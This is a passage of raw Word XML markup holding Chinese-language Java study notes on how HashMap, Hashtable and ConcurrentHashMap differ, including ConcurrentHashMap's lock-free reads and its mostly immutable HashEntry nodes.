        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>类构造函数的一个可选参数，默认值为</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这样在多线程情况下就能避免争用。欲了解更多并发度和内部大小调整请阅读我的文章</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009F09B5">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>How ConcurrentHashMap works in Java</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892E91" w:rsidRPr="00F41A4C" w:rsidRDefault="00892E91" w:rsidP="00AD32EA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="00620C20" w:rsidP="00003C0C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00EE43F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.4</w:t>
      </w:r>
      <w:r w:rsidR="009636E4" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="009636E4" w:rsidRPr="00F41A4C">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="009636E4" w:rsidRPr="00F41A4C">
        <w:t>concurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidR="009636E4" w:rsidRPr="00F41A4C">
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>只有一把锁，每个方法进行同步，效率低下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>完全</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>允许多个读操作并发进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，读操作并不需要加锁。如果使用传统的技术，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的实现，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>果允许可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的中间添加或删除元素，读操作不加锁将得到不一致的数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现技术是保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>几乎是不可变的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>代表每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链中的一个节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009636E4" w:rsidRPr="00F41A4C" w:rsidRDefault="009636E4" w:rsidP="009636E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可以看到除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，其它值都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，这意味着不能从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的中间或尾部添加或删除节点，因为这需要修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>引用值，所有的节点的修改只能从头部开始。对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，可以一律添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的头部。但是对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，可能需要从中间删除一个节点，这就需要将要删除节点的前面所有节点整个复制一遍，最后一个节点指向要删除结点的下一个结点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546038" w:rsidRPr="00F41A4C" w:rsidRDefault="00546038" w:rsidP="00F436B6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00F436B6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>好像今天没有什么源码读，那么就来看看</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_self" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="202859"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>java</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的这两种</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>有啥不一样的地方吧，在这之前先普及一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的一些基本知识：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）放入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的元素是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
